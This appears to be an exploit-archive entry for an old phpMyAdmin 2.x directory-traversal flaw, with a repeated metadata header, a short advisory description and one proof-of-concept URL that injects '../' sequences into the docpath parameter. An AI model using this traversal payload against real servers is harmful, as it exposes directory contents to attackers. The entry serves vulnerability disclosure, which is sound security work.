phpMyAdmin 2.x - Information Disclosure
| EKU-ID: 28269 | CVE: OSVDB-8450 | OSVDB-ID: |
| Author: Lorenzo Manuel Hernandez Garcia-Hierro | Published: 2003-06-18 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28269 | CVE: OSVDB-8450 | OSVDB-ID: |
| Author: Lorenzo Manuel Hernandez Garcia-Hierro | Published: 2003-06-18 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7963/info A vulnerability has been reported for phpMyAdmin that may reveal the contents of directories to remote attackers. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, dot-dot-slash '../' directory traversal sequences are not sufficiently sanitized from URI parameters. http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=[../../../]